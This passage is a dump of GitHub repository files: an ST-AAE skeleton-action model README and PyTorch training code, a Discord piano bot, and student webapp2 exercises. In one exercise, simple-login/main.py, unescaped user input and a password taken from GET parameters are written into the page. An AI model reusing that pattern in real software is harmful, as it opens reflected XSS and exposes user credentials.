"text": "# Spatial Temporal Adversarial Autoencoder\n## Description\n Spatial Temporal Adversarial Autoencoder is a model that based on ST-GCN and AAE. The model is a multi task modal tha able to classify the action class, cluster the class of action and generate skeleton data.\n\n## Initialization\n### Pre-Installation\n The package for the model can be downlaod and install with the command:\n ```\n pip install --upgrade --force-reinstall -r requirements.txt\n ```\n Beside, torchlight module is used in the code and t can be install with te command:\n ```\n cd ./torchlight ; python setup.py install ; cd ..\n ```\n After That, restart of the terminal seasion is need to apply latest update of the installation\n### Dataset \n NTU RGB+D 120 Dataset ,can be download from URL: http://rose1.ntu.edu.sg/datasets/actionrecognition.asp\n \n For Data Extraction and preprocessing for the model, used the command:\n ```\n pyhon ./data_gen/<type of dataset generator> --path <path of the skeleton data of the dataset>\n # <type of dataset generator> = ntu5_gendata.py for dataset with 5 action classes\n # = ntu20_gendata.py for dataset with 20 action classes\n # = ntu120_gendata.py for dataset with 120 action classes which is the wwhole set\n ```\n### Pre-Training model\n The weight of the model can be download from the Drive:\n URL: https://drive.google.com/drive/folders/1X8vj9tTy8rfos5M_id_LeLDtPWdQQ0ZR?usp=sharing\n \n In the drive is the working diractory of the ST-AAE, which the layout will be /<dataset>/<Test Name>/.\n ```\n <dataset> = xset_5 (The working directory of dataset NTU5 in cross setup) \n = xsub_5 (The working directory of dataset NTU5 in cross subject)\n = xset_20 (The working directory of dataset NTU20 in cross setup)\n = xsub_20 (The working directory of dataset NTU20 in cross subject)\n = st-gcn_5 (The working directory of dataset NTU5 for ST-GCN)\n = st-gcn_20 (The working directory of dataset NTU20 for ST-GCN)\n ```\n ```\n <Test Name> = Final (Supervised Learning of ST-AAE)\n = Final_unsuperviser (Unsupervised Learning of ST-AAE)\n = others (testing on different setting)\n ```\n \n## ST-AAE\n### Run Model \n For run supervised learning model :\n ```\n python main_supervised.py --config \"./config/<dataset config>/train.yaml\" \n --work_dir <output working directory>\n --weights <path of the model weights file which use to load the save weight of model>\n ```\n \n For run unsupervised learning model :\n ```\n python main_unsupervised.py --config \"./config/<dataset config>/train.yaml\" \n --work_dir <output working directory>\n --weights <path of the model weights file which use to load the save weight of model>\n ```\n \n### Display The Skeleton Data\n Display the Skeleton data and Reconstructed skeleton data with commmand:\n ```\n python display_data.py --data <path of original data file>\n --recon <path of the reconstructed data file>\n --save <True for save all the figure per frame, default = False>\n ```\n"
},
{
"alpha_fraction": 0.620396614074707,
"alphanum_fraction": 0.6288951635360718,
"avg_line_length": 22.600000381469727,
"blob_id": "dd599d5be5e88ec50d97286ae1027e2c38090865",
"content_id": "ebc80a81301db7621a09eeb24bd07b832eb5c0c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 353,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 15,
"path": "/main_unsupervised.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\nfrom processor.recognition_cluster import REC_Processor\n\ndef import_class(name):\n components = name.split('.')\n mod = __import__(components[0])\n for comp in components[1:]:\n mod = getattr(mod, comp)\n return mod\n\nif __name__ == \"__main__\":\n \n processor = REC_Processor(sys.argv[1:])\n processor.start()"
},
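The import_class helper in main_unsupervised.py resolves a dotted path into a Python object at runtime, which is how a config file can name a model class as a plain string. A standalone sketch of the same idea (the dotted name "os.path.join" is just an example):

```python
def import_class(name):
    # Walk from the top-level module down the attribute chain.
    components = name.split('.')
    mod = __import__(components[0])
    for comp in components[1:]:
        mod = getattr(mod, comp)
    return mod

join = import_class('os.path.join')   # resolve the string to the actual callable
print(join('a', 'b'))                  # a/b
```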
{
"alpha_fraction": 0.5093348622322083,
"alphanum_fraction": 0.5198416113853455,
"avg_line_length": 35.709197998046875,
"blob_id": "11b9230c2ccac6f9f526c00d10cc8fd64b432a24",
"content_id": "247172ed44514f92fa9dd929c9512c907c437fbe",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12373,
"license_type": "permissive",
"max_line_length": 148,
"num_lines": 337,
"path": "/processor/recognition.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# pylint: disable=W0201\n\nimport sys\n# sys.path.extend(['../'])\n\nimport argparse\nimport yaml\nimport numpy as np\nimport time\nimport itertools\nimport os\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n# torchlight\nimport torchlight\nfrom torchlight import str2bool\nfrom torchlight import DictAction\nfrom torchlight import import_class\n\nfrom .processor import Processor\n\ntorch.set_printoptions(threshold=5000)\n\ndef weights_init(m): \n classname = m.__class__.__name__\n \n if classname.find('Conv1d') != -1:\n m.weight.data.normal_(0.0, 0.02)\n \n if m.bias is not None:\n m.bias.data.fill_(0)\n \n elif classname.find('Conv2d') != -1:\n m.weight.data.normal_(0.0, 0.02)\n \n if m.bias is not None:\n m.bias.data.fill_(0)\n \n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nclass REC_Processor(Processor):\n \"\"\"\n Processor for Skeleton-based Action Recgnition\n \"\"\"\n\n def loss(self,recon_x, x,label, cat_y, logvar):\n \n args = {\"reduction\" : \"mean\"}\n\n\n weight = torch.tensor([1, 1, 1, 1, 1],requires_grad=False).to(self.dev)\n\n N,C,T,V,M = x.size()\n \n #spatial loss & pos\n recon_loss = weight[0] * nn.functional.mse_loss(recon_x, x,**args)\n\n #velocity loss \n t1 = x[:, :, 1:] - x[:, :, :-1]\n t2 = recon_x[:, :, 1:] - recon_x[:, :, :-1]\n\n recon_loss += weight[1] * nn.functional.mse_loss(t1, t2, **args)\n\n #acceleration loss\n a1 = x[:, :, 2:] - 2 * x[:, :, 1:-1] + x[:, :, :-2]\n a2 = recon_x[:, :, 2:] - 2 * recon_x[:, :, 1:-1] + recon_x[:, :, :-2]\n\n recon_loss += weight[2] * nn.functional.mse_loss(a1, a2, **args)\n \n #catogory loss(classify loss)\n cat_loss = F.cross_entropy(cat_y, label, **args )\n cat_loss = weight[3] * cat_loss\n\n # Discriminator loss\n valid = Variable( torch.zeros( cat_y.shape[0] , 1 ).fill_(1.0), requires_grad=False ).float().to(self.dev)\n d_loss = F.binary_cross_entropy(self.model.y_discriminator(cat_y) , valid, **args )\n\n valid = Variable( torch.zeros( logvar.shape[0] , 1 ).fill_(1.0), requires_grad=False ).float().to(self.dev)\n d_loss += F.binary_cross_entropy(self.model.z_discriminator(logvar), valid,**args )\n \n d_loss = weight[4] * d_loss\n\n \n # KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(),1).mean()\n \n return (recon_loss + cat_loss + d_loss) / (weight.sum()) , cat_loss * weight[3]\n\n def load_model(self):\n \n self.model = self.io.load_model(self.arg.model, **(self.arg.model_args))\n self.model.apply(weights_init)\n\n def load_optimizer(self):\n \n if( self.arg.optimizer == 'SGD'):\n self.optimizer = dict() \n \n self.optimizer[\"autoencoder\"] = optim.SGD(\n itertools.chain(self.model.encoder.parameters(), self.model.parameters()),\n lr = self.arg.base_lr,\n momentum = 0.9,\n nesterov = self.arg.nesterov,\n weight_decay = self.arg.weight_decay\n )\n\n self.optimizer[\"y_discriminator\"] = optim.SGD(\n self.model.y_discriminator.parameters(),\n lr = self.arg.base_lr,\n momentum = 0.9,\n nesterov = self.arg.nesterov,\n weight_decay = self.arg.weight_decay\n )\n\n self.optimizer[\"z_discriminator\"] = optim.SGD(\n self.model.z_discriminator.parameters(),\n lr = self.arg.base_lr,\n momentum = 0.9,\n nesterov = self.arg.nesterov,\n weight_decay = self.arg.weight_decay\n )\n\n elif( self.arg.optimizer == 'Adam'):\n self.optimizer = dict()\n\n self.optimizer[\"autoencoder\"] = optim.Adam(\n 
itertools.chain(self.model.encoder.parameters(), self.model.parameters()),\n lr = self.arg.base_lr,\n weight_decay = self.arg.weight_decay\n )\n\n self.optimizer[\"y_discriminator\"] = optim.Adam(\n self.model.y_discriminator.parameters(),\n lr = self.arg.base_lr,\n weight_decay = self.arg.weight_decay\n )\n \n self.optimizer[\"z_discriminator\"] = optim.Adam(\n self.model.z_discriminator.parameters(),\n lr = self.arg.base_lr,\n weight_decay = self.arg.weight_decay\n )\n else:\n raise ValueError()\n\n def adjust_lr(self):\n\n if self.arg.step:\n lr = self.arg.base_lr * ( 0.1 ** np.sum( self.meta_info['epoch'] >= np.array(self.arg.step)))\n \n for name, optimizer in self.optimizer.items():\n \n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n \n self.lr = lr\n\n def show_topk(self, k):\n rank = self.result.argsort()\n\n hit_top_k = [ l in rank[i, -k:] for i, l in enumerate(self.label)]\n \n accuracy = sum(hit_top_k) * 1.0 / len(hit_top_k)\n \n self.io.print_log('\\tTop{}: {:.2f}%'.format(k, 100 * accuracy))\n\n def train(self):\n self.model.train()\n self.adjust_lr()\n self.meta_info['iter'] = 0\n self.io.record_time()\n\n loader = self.data_loader['train']\n loss_value = []\n \n for data, label in loader:\n\n # get data\n data = data.float().to(self.dev)\n label = label.long().to(self.dev)\n \n N,C,T,V,M = data.size()\n \n # forward\n recon_data, cat_y, latent_z, z = self.model(data)\n\n # autoencoder loss\n loss, cat_loss = self.loss(recon_data, data, label , cat_y, latent_z)\n \n # backward\n self.optimizer[\"autoencoder\"].zero_grad()\n loss.backward()\n self.optimizer[\"autoencoder\"].step()\n\n # cat_y discriminator train\n valid = Variable(torch.zeros(label.shape[0], 1 ).fill_(1.0), requires_grad=False).float().to(self.dev)\n fake = Variable(torch.zeros(label.shape[0], 1 ).fill_(0.0), requires_grad=False).float().to(self.dev)\n \n one_hot_label = F.one_hot(label, num_classes = self.model.num_class).float().to(self.dev)\n\n y_loss = F.binary_cross_entropy(self.model.y_discriminator(one_hot_label.detach()) , valid )\n y_loss += F.binary_cross_entropy(self.model.y_discriminator(cat_y.detach()) , fake )\n y_loss = y_loss * 0.5\n \n self.optimizer[\"y_discriminator\"].zero_grad()\n y_loss.backward()\n self.optimizer[\"y_discriminator\"].step()\n \n # latent_z discriminator train\n valid = Variable(torch.zeros(latent_z.shape[0], 1 ).fill_(1.0), requires_grad=False).float().to(self.dev)\n fake = Variable(torch.zeros(latent_z.shape[0], 1 ).fill_(0.0), requires_grad=False).float().to(self.dev)\n\n sample_z = torch.randn_like( latent_z, requires_grad=False )\n\n z_loss = F.binary_cross_entropy(self.model.z_discriminator(sample_z.detach()) , valid )\n z_loss += F.binary_cross_entropy(self.model.z_discriminator(latent_z.detach() ) , fake )\n z_loss = z_loss * 0.5\n\n self.optimizer[\"z_discriminator\"].zero_grad()\n z_loss.backward()\n self.optimizer[\"z_discriminator\"].step()\n\n #get matched\n (values, indices) = cat_y.max(dim=1)\n\n # statistics\n self.iter_info['loss'] = loss.data.item()\n self.iter_info['cat_loss'] = cat_loss.data.item()\n self.iter_info['acc'] = \"{} / {}\".format( (label == indices).sum().data.item() , len(label) )\n \n self.iter_info['y_loss'] = y_loss.data.item()\n self.iter_info['z_loss'] = z_loss.data.item()\n self.iter_info['lr'] = '{:.6f}'.format(self.lr)\n self.iter_info['time'] = '{:.6f}'.format(int(time.time() - self.io.cur_time))\n \n loss_value.append( self.iter_info['loss'] )\n \n self.show_iter_info()\n self.meta_info['iter'] += 1\n \n 
print(indices.view(-1))\n print(label.view( -1 ))\n print((label == indices).sum(),len(label) )\n \n if(not os.path.exists(self.io.work_dir + \"/result\")):\n os.makedirs(self.io.work_dir + \"/result/\")\n\n np.save(self.io.work_dir + \"/result/data{}.npy\".format(self.meta_info[\"epoch\"]),data.cpu().numpy())\n np.save(self.io.work_dir + \"/result/recon{}.npy\".format(self.meta_info[\"epoch\"]),recon_data.detach().cpu().numpy())\n \n self.epoch_info['mean_loss']= np.mean(loss_value)\n self.show_epoch_info()\n self.io.print_timer()\n\n def test(self, evaluation=True):\n\n self.model.eval()\n\n loader = self.data_loader['test']\n loss_value = []\n result_frag = []\n label_frag = []\n\n for data, label in loader:\n \n # get data\n data = data.float().to(self.dev)\n label = label.long().to(self.dev)\n \n # evaluation\n with torch.no_grad():\n recon_data, cat_y, latent_z, z = self.model(data)\n \n result_frag.append(cat_y.data.cpu().numpy())\n \n # get loss\n if evaluation:\n\n loss, cat_loss = self.loss( recon_data, data, label, cat_y, latent_z)\n loss_value.append( loss.data.item() )\n label_frag.append( label.data.cpu().numpy() )\n\n if(not os.path.exists(self.io.work_dir + \"/result\")):\n os.makedirs(self.io.work_dir + \"/result/\")\n\n np.save(self.io.work_dir + \"/result/eval_data{}.npy\".format(self.meta_info[\"epoch\"]),data.cpu().numpy())\n np.save(self.io.work_dir + \"/result/eval_recon{}.npy\".format(self.meta_info[\"epoch\"]),recon_data.detach().cpu().numpy())\n\n self.result = np.concatenate( result_frag )\n \n if(evaluation):\n self.io.print_log(\"Evaluation {}:\".format(self.meta_info[\"epoch\"]))\n \n self.label = np.concatenate( label_frag )\n self.epoch_info['label'] = self.label\n self.epoch_info['mean_loss'] = np.mean( loss_value )\n self.show_epoch_info()\n\n # show top-k accuracy\n for k in self.arg.show_topk:\n self.show_topk( k )\n\n @staticmethod\n def get_parser(add_help = False ):\n\n # parameter priority: command line > config > default\n parent_parser = Processor.get_parser(add_help = False )\n \n parser = argparse.ArgumentParser(\n add_help = add_help,\n parents = [ parent_parser ],\n description = 'Spatial Temporal Graph Convolution Network' \n )\n\n # region arguments yapf: disable\n \n # evaluation\n parser.add_argument('--show_topk' , type=int , default=[1, 5], nargs='+' , help='which Top K accuracy will be shown')\n \n # optim\n parser.add_argument('--base_lr' , type=float , default=0.01 , help='initial learning rate')\n parser.add_argument('--step' , type=int , default=[] , nargs='+' , help='the epoch where optimizer reduce the learning rate')\n parser.add_argument('--optimizer' , default='SGD' , help='type of optimizer')\n parser.add_argument('--nesterov' , type=str2bool , default=True , help='use nesterov or not')\n parser.add_argument('--weight_decay', type=float , default=0.0001 , help='weight decay for optimizer')\n \n # endregion yapf: enable\n\n return parser\n\n\n"
}
] | 9 |
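The adjust_lr method in recognition.py above implements a step decay: the base learning rate is multiplied by 0.1 once for every milestone the current epoch has reached. A self-contained sketch of that arithmetic (the milestones here are chosen arbitrarily):

```python
import numpy as np

base_lr, step = 0.01, [20, 40]          # illustrative values for --base_lr and --step
for epoch in (0, 19, 20, 40, 60):
    lr = base_lr * (0.1 ** np.sum(epoch >= np.array(step)))
    print(epoch, lr)                     # ~0.01 before epoch 20, ~0.001 after, ~1e-4 from epoch 40 on
```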
MasonAsh/dispiano
|
https://github.com/MasonAsh/dispiano
|
0d89e9e9aa191aae3dc6638dbdbfbccfb67c0890
|
d8e665e75919f504fe9c60edd96235645c4304eb
|
9a5a72c2dd6b290db9459ce2c9cb72c2000caf6e
|
refs/heads/master
| 2022-11-24T16:51:23.370217 | 2022-11-18T15:27:23 | 2022-11-18T15:27:23 | 130,544,050 | 5 | 1 |
MIT
| 2018-04-22T07:11:54 | 2022-08-25T01:30:09 | 2022-11-18T15:27:24 |
Python
|
[
{
"alpha_fraction": 0.5798165202140808,
"alphanum_fraction": 0.6660550236701965,
"avg_line_length": 24.952381134033203,
"blob_id": "6bc553bdd7ef1ce74edbcb0cd2021da088a02947",
"content_id": "ffd266cdaf359e5bb7f5d2f613b103d06b4c1227",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1091,
"license_type": "permissive",
"max_line_length": 285,
"num_lines": 42,
"path": "/README.md",
"repo_name": "MasonAsh/dispiano",
"src_encoding": "UTF-8",
"text": "# dispiano\nA discord bot for playing music notes.\n\ndispiano utilizes the pysynth library to create audio from musical notes.\n\n### Example command:\n\n```\nBach: Bourrée (from BWV 996)\n!piano e,8 f#,8 g,4 F#,8 e,8 d#,4 e,8 f#,8 b3,4 c#,8 d#,8 e,4 d,8 c,8 b3,4 c#,8 d#,8 e,4 d,8 c,8 b3,4 a3,8 g3,8 f#3,4 g3,8 a3,8 b3,8 a3,8 g3,8 f#3,8 e3,4 e,8 f#,8 g,4 f#,8 e,8 d#,4 e,8 f#,8 b3,4 c#,8 d#,8 e,4 d,8 c,8 b3,4 a3,8 g3,8 f#3,32 g3,32 f#3,32 g3,32 f#3,32 g3,32 f#3,6 g3,8 g3*\n```\n\n### Usage:\n\nTo use dispiano you need to create a bot for discord and then generate a token:\n\nhttps://github.com/reactiflux/discord-irc/wiki/Creating-a-discord-bot-&-getting-a-token\n\nThen add the bot to your server:\n\nhttps://github.com/jagrosh/MusicBot/wiki/Adding-Your-Bot-To-Your-Server\n\nNext you need to install the dependencies:\n\n* __discord.py__\n\n ```python3 -m pip install -U discord.py```\n\n* __PySynth__\n\n Download the stable release from:\n https://mdoege.github.io/PySynth/#d\n\n then run setup.py:\n\n ```python3 setup.py install```\n \nNow you can run dispiano:\n\n```\npython3 dispiano.py <YOUR_TOKEN_HERE>\n```\n"
},
{
"alpha_fraction": 0.5219805836677551,
"alphanum_fraction": 0.529847264289856,
"avg_line_length": 23.011110305786133,
"blob_id": "f8779cf80bcc46ea4dbd19f0dacdb6004a954183",
"content_id": "c9ca13dda98574c0c965553279c6ff572ff286ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2161,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 90,
"path": "/dispiano.py",
"repo_name": "MasonAsh/dispiano",
"src_encoding": "UTF-8",
"text": "import discord\nimport pysynth as psb\nimport sys\nimport asyncio\n\n\nclient = discord.Client(intents=discord.Intents.all())\ncommand_lock = asyncio.Lock()\n\n\ndef parse_client_message_content(message):\n tokens = message.split()\n # Strip the \"!piano\"\n tokens = tokens[1:]\n\n bpm = 110\n\n try:\n bpm = int(tokens[0])\n tokens = tokens[1:]\n except:\n pass\n\n bpm = max(30, min(800, bpm))\n\n song = []\n\n for token in tokens:\n note = token\n length = 4\n if ',' in token:\n parts = token.split(',')\n note = parts[0].lower()\n length = float(parts[1])\n song.append((note.lower(), length))\n\n return (song, bpm)\n\n\[email protected]\nasync def on_message(message):\n if message.content.startswith('!piano'):\n await command_lock.acquire()\n if message.author.voice is None:\n await message.channel.send(\n 'Hey dumb dumb! ' +\n 'You need to be in a voice channel to use this bot.')\n command_lock.release()\n return\n\n try:\n song, bpm = parse_client_message_content(message.content)\n except:\n await message.channel.send(\n 'Hey dumb dumb! ' +\n 'Your notes are malformed!')\n command_lock.release()\n return\n\n try:\n psb.make_wav(song, fn=\"out.wav\", bpm=bpm)\n except:\n await message.channel.send(\n 'Hey dumb dumb! ' +\n 'Your notes are malformed!')\n command_lock.release()\n return\n\n try:\n voice = await message.author.voice.channel.connect()\n\n player = discord.FFmpegPCMAudio('out.wav')\n voice.play(player)\n\n while voice.is_playing():\n await asyncio.sleep(1)\n finally:\n await voice.disconnect()\n command_lock.release()\n\ndef main():\n if len(sys.argv) == 2:\n token = sys.argv[1]\n client.run(token)\n else:\n print(\"Error: must pass in your bot's token as a command line argument!\")\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
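The token grammar dispiano.py accepts is "note" or "note,length". A minimal, Discord-free sketch of the per-token parsing done inside parse_client_message_content (the parse_token function name is hypothetical, introduced only for this example):

```python
def parse_token(token):
    # Default length is a quarter note (4), matching the bot's behavior.
    note, length = token, 4
    if ',' in token:
        parts = token.split(',')
        note, length = parts[0], float(parts[1])
    return (note.lower(), length)

print(parse_token('e,8'))   # ('e', 8.0)
print(parse_token('b3'))    # ('b3', 4)
```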
ednalda/Design-Patterns-for-Web-Programming
|
https://github.com/ednalda/Design-Patterns-for-Web-Programming
|
1a0e69375f874f3567480f6b5a8e6d0efa14feaf
|
de997d4f3d55f1cc345240ea927ea72584cef0c7
|
f84380836f847b1d1cd02a4db6a412db96ade3bd
|
refs/heads/master
| 2021-01-18T11:33:09.213017 | 2014-10-06T17:36:27 | 2014-10-06T17:36:27 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4618671238422394,
"alphanum_fraction": 0.4695577919483185,
"avg_line_length": 45.3564338684082,
"blob_id": "c130a883f3c78f61b98af8977e4ea7be7d291f5c",
"content_id": "1f1b239b5f56ab9420f0b4b7f7f21d8f7b97d3db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4681,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 101,
"path": "/simple-login/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n'''\nname:Ednalda Fakira\ndate:09/11/14\nclass:Design Patterns for Web Programming - Online\nassignment: Simple Form\n'''\nimport webapp2 # use the webapp2 library\n\nclass MainHandler(webapp2.RequestHandler): #declaring a class\n def get(self): #function that starts everything. Catalyst\n\n page_head = ''' <!DOCTYPE HTML>\n<html>\n <head>\n <title>\"BoatHouse\"</title>\n <link href=\"css/style.css\" rel=\"stylesheet\" type=\"text/css\" />\n </head>\n <body> '''\n page_body = ''' <div id=\"content\">\n <div id=\"header\">\n <h1> The BoatHouse</h1>\n <ul>\n <li><a href=\"#\" class=\"link\">Home</a></li>\n <li><a href=\"#\" class=\"link\">News</a></li>\n <li><a href=\"#\" class=\"link\">Favorite</a></li>\n <li><a href=\"#\" class=\"link\">About</a></li>\n <li><a href=\"#\" class=\"link\">Log On</a></li>\n </ul>\n </div>\n <form method=\"GET\" action=\"\">\n <h2>Register to post your Add</h2>\n <label>Name: </label><br/><input type=\"text\" name=\"user\" class=\"input\" /><br />\n <label>Address: </label><br/><input type=\"text\" name=\"address\" class=\"input\" /><br />\n <label>Phone: </label><br/><input type=\"text\" name=\"phone\" class=\"input\"/><br /><br /><br />\n <label>Ad</label><br/><input type=\"text\" name=\"ad\" class=\"input\"/><br /><br /><br />\n <label>Email: </label><br/><input type=\"text\" name=\"email\" class=\"input\"/><br />\n <label>Password: </label><br/><input type=\"text\" name=\"password\" class=\"input\" /><br /><br /><br />\n <input type=\"checkbox\" name=\"policy\" value =\"policy\"><a href=\"#\" class=\"link\">Agree with Policy</a><br /><br />\n <input type=\"submit\" value=\"Submit\" class=\"submit\" /> </form>'''\n page_answer = '''\n <div id=\"page\">\n <div id=\"header\">\n <h1> The BoatHouse</h1>\n <ul>\n <li><a href=\"#\" class=\"link\">Home</a></li>\n <li><a href=\"#\" class=\"link\">News</a></li>\n <li><a href=\"#\" class=\"link\">Favorite</a></li>\n <li><a href=\"#\" class=\"link\">About</a></li>\n <li><a href=\"#\" class=\"link\">Log On</a></li>\n </ul>\n </div>\n <div id=\"page_content\">\n <h3>Name:</h3> <h3>Address:</h3> <h3>Phone:</h3> <h3>Email:</h3> <h3>Password:</h3> <h3>Ad:</h3>\n </div>\n </div>\n '''\n page_close = '''\n </div>\n </body>\n</html> '''\n\n\n\n if self.request.GET: #stablish condition\n user = self.request.GET['user']#condition true\n address = self.request.GET['address']#condition true\n phone = self.request.GET['phone']#condition true\n ad = self.request.GET['ad']\n email = self.request.GET['email']#condition true\n password = self.request.GET['password']#condition true\n policy = self.request.GET ['policy']\n self.response.write(page_head + page_answer + ' ' + user + ' ' + address + ' ' + phone + ' ' + email + ' ' + password + ' ' + ad + ' ' + policy + ' ' + page_close)#all condition are true\n\n\n else: #if condition above not satisfied, print next line\n self.response.write(page_head + page_body + 
page_close)#print out page\n\n\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)"
},
{
"alpha_fraction": 0.6022624373435974,
"alphanum_fraction": 0.6230769157409668,
"avg_line_length": 35.528926849365234,
"blob_id": "42f4217f357397aa31c2efefd4c01a04ac109261",
"content_id": "419b9342de33fc2468c251150937907a68582eee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4420,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 121,
"path": "/encapsulation/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n'''\nname:Ednalda Fakira\ndate:18/11/14\nclass:Design Patterns for Web Programming - Online\nassignment: Encapsulating\n'''\nimport webapp2\n#it connects to class Page in a separate file.\nfrom pages import Page\n#it connects to class Delivered from deliveres file.\nfrom deliveres import Delivered\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n #function defines attributes of five objects: s, n, f, j, m\n #get function print_out to print html\n #get function if statement that defines condition for printing class Delivered attributes\n\n s = Delivered()#defines class delivered attributes for September\n s.sale1 = 40#how much it cost each sales\n s.sale2 = 69\n s.sale3 = 36\n s.sale4 = 89\n s.sale5 = 24\n s.calc_total()#function to calculate the total of September sales.\n\n\n #\"November\" class delivered variables\n n = Delivered()#defines class delivered attributes for November\n n.sale1 = 50#how much it cost each sales\n n.sale2 = 55\n n.sale3 = 68\n n.sale4 = 93\n n.sale5 = 32\n n.calc_total()#function to calculate the total of November sales.\n\n\n #February delivered\n f = Delivered()#defines class delivered attributes for February\n f.sale1 = 24#how much it cost each sales\n f.sale2 = 12\n f.sale3 = 18\n f.sale4 = 84\n f.sale5 = 34\n f.calc_total()#function to calculate the total of February sales.\n\n\n\n j = Delivered()#defines class delivered attributes for June\n j.sale1 = 50#how much it cost each sales\n j.sale2 = 50\n j.sale3 = 50\n j.sale4 = 50\n j.sale5 = 50\n j.calc_total()#function to calculate the total of June sales.\n\n\n #May delivered\n m = Delivered()#defines class delivered attributes for May\n m.sale1 = 50#how much it cost each sales\n m.sale2 = 50\n m.sale3 = 50\n m.sale4 = 50\n m.sale5 = 50\n m.calc_total()#function to calculate the total of May sales.\n\n\n\n #call class Page to print in this page\n p = Page()\n self.response.write(p.print_out())\n\n #if the links are requested, it's print_out_data function called to print the data from the self.month\n if self.request.GET:\n #if we have September after name in url\n if self.request.GET['name'] == 'september':\n p.month_data = s #part of the html from class Page that holds the class Delivered attributes for each month\n title ='s.title'\n self.response.write(p.print_out_data())# call function print_out_data from class Page to print Delivered attributes.\n #if we have November after name in url\n elif self.request.GET ['name'] == 'november':\n p.month_data = n\n self.response.write('November' + p.print_out_data())\n #if we have February after name in url\n elif self.request.GET ['name'] == 'february':\n p.month_data = f\n self.response.write(p.print_out_data())\n #if we have June after name in url\n elif self.request.GET ['name'] == 'june':\n p.month_data = j\n self.response.write(p.print_out_data())\n #if we have May after name in url\n elif self.request.GET ['name'] == 'may':\n 
p.month_data = m\n self.response.write(p.print_out_data())\n #if we don't find any of the names above after name in url, just print same page\n else:\n self.response.write(p.head + p.body + p.close)\n #the print is empty to avoid the same page print twice.\n else:\n self.response.write('')\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)\n"
},
{
"alpha_fraction": 0.42394503951072693,
"alphanum_fraction": 0.4278704524040222,
"avg_line_length": 21.622222900390625,
"blob_id": "0e63718fd633b86f24e9188e917e76b6e7bdb43b",
"content_id": "4ae81fb87c5954d58ca606cbcb6c9b945e7b58bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1019,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 45,
"path": "/proof/view.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#Ednalda Fakira\n#Assigment: Proof of Concept\n#Course:Design Patterns for Web Programming\n#Instructor: Rebecca Carroll\n\n\n#MVC = v(view)\nclass AppView(object):#superclass\n def __init__(self):\n self.title = \"MovieNight!\"\n self.css = \"css/style.css\"\n self.head = \"\"\"\n<!DOCTYPE HTML>\n <html>\n <head>\n <title>{self.title}</title>\n <link href=\"{self.css}\" rel=\"stylesheet\" type=\"text/css\" />\n </head>\n <body>\n \"\"\"\n\n self.body = ''' <div id =\"page\">\n <header>\n <nav><h1>MovieNight</h1></nav>\n <h2>Search movies by Actor</h2>\n </header>\n <div id=\"content\">\n\n </div>\n </div>\n\n '''\n\n self.close = \"\"\"\n\n\n </body>\n </html>\n \"\"\"\n\n\n def print_out_view(self):\n all = self.head + self.body + self.close\n all = all.format(**locals())\n return all\n\n"
},
{
"alpha_fraction": 0.6966156363487244,
"alphanum_fraction": 0.7179693579673767,
"avg_line_length": 30.012500762939453,
"blob_id": "0176f65e677a67d52780e851a35ee6746ed54761",
"content_id": "dc60302441de568009e22c7ed2553854d955f764",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2482,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 80,
"path": "/fakira_ednalda_Madlib/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
